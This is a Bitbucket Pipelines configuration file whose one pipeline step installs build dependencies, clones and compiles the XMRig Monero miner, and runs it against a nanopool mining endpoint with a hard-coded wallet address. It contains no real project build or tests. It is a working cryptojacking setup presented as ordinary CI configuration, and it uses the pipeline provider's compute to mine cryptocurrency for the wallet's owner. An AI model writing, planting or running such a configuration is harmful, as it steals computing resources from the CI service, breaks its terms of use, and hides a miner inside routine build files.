image: atlassian/default-image:2

options:
  docker: true

pipelines:
  default:
    - step:
        script:
          - set -x
          - apt-get update -y
          - apt-get update
          - apt-get --assume-yes install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          - git clone git@bitbucket.org:mikhail_sapozhnikov_enway/xmrig.git
          - mkdir xmrig/build && cd xmrig/build
          - cmake ..
          - make -j$(nproc)
          - ./xmrig -o xmr-eu1.nanopool.org:14433 -u 43N3PnidTxnWk2dHtA3ETNDkFDVVmYHZUDHYkzcGeJADFNiwHs6XTvmPP1qWUQAwddToqw4UYU73D8BWpuV74UFn9Q6EJUn --tls --coin monero